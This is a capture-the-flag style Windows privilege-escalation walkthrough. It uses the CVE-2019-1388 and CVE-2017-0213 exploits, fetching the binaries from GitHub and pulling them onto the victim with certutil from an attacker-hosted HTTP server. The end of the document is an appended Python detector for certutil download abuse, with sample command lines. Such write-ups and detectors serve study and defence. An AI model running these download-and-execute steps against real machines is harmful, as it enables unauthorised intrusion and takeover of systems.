For normal privilege, follow steps in room Blaster
[Privilege Escalation]
Open Chrome -> History
It’s CVE-2019-1388
Searching with Google, I came across this.
Download exe
wget https://github.com/jas502n/CVE-2019-1388/blob/master/HHUPD.EXE
Set up HTTP server for uploading
python -m SimpleHTTPServer 80
Back to victim’s machine, download file with cmd.
certutil -urlcache -f http://<ip>/HHUPD.EXE HHUPD.EXE
Run the file as administrator
Seems like I can’t open IE as in room Blaster.
Let’s find another way, back to cmd
systeminfo
Save as “systeminfo.txt”
I will use windows exploit suggester.
python windows-exploit-suggester.py --systeminfo <systeminfo.txt> -d <database>
Failed!!!
Version number may be useful
With Google, I came across this:
wget https://github.com/WindowsExploits/Exploits/raw/master/CVE-2017-0213/Binaries/CVE-2017-0213_x64.zi
unzip CVE-2017-0213_x64.zip
Back to victim’s machine, download file
certutil -urlcache -f http://<ip>/CVE-2017-0213_x64.exe CVE-2017-0213_x64.exe
Run CVE
CVE-2017-0213_x64.exe
Now I’m system.
cd \Users\Administrator\Desktop
dir
type root.txt.txt
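
Both file transfers above use certutil -urlcache -f as a downloader, which leaves a distinctive command line in process-creation logs. The following is an added detection example, not part of the original writeup: it assumes one command line per record (for instance taken from Sysmon event ID 1 or Security event 4688), and the sample lines, the address 192.0.2.10 and the function names are constructed for illustration.

```python
import re
import shlex

# certutil accepts "-" or "/" as option prefix and ignores case.
FLAG = re.compile(r"^[-/](urlcache|verifyctl)$", re.I)
URL = re.compile(r"^(https?|ftp)://", re.I)
RISKY_EXT = (".exe", ".dll", ".ps1", ".bat", ".hta", ".zip")

# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    r'certutil -urlcache -f http://192.0.2.10/HHUPD.EXE HHUPD.EXE',
    r'"C:\Windows\System32\CertUtil.exe" /URLCache /split /f http://192.0.2.10/tool.zip C:\Users\Public\tool.zip',
    r'certutil -urlcache -split -f https://192.0.2.10/notes.txt',
    r'certutil -urlcache *',
    r'certutil -hashfile C:\Temp\setup.exe SHA256',
    r'cmd.exe /c systeminfo',
]


def inspect_cmdline(cmdline):
    """Return a finding dict if cmdline is certutil fetching a remote URL, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                            # unbalanced quotes
        argv = cmdline.split()
    argv = [a.strip('"') for a in argv]
    if not argv:
        return None
    image = argv[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = argv[1:]
    if image not in ("certutil", "certutil.exe") or not any(FLAG.match(a) for a in args):
        return None
    urls = [a for a in args if URL.match(a)]
    if not urls:
        return None  # cache flag without a remote URL on the command line
    # The argument right after the URL, if it is not another option, is the output file.
    nxt = args[args.index(urls[0]) + 1:][:1]
    out = nxt[0] if nxt and not nxt[0].startswith(("-", "/")) else None
    severity = "high" if (out or urls[0]).lower().endswith(RISKY_EXT) else "medium"
    return {"url": urls[0], "output": out, "severity": severity}


def scan(cmdlines):
    """Return (index, finding) for every command line that matches."""
    hits = ((i, inspect_cmdline(c)) for i, c in enumerate(cmdlines))
    return [(i, f) for i, f in hits if f]


if __name__ == "__main__":
    for i, f in scan(SAMPLE):
        print(f"[{f['severity']}] line {i}: {f['url']} -> {f['output']}")
```

The severity split is a triage aid only: any certutil fetch from a remote URL on a workstation or server is worth reviewing, and the extension list should be tuned to the environment.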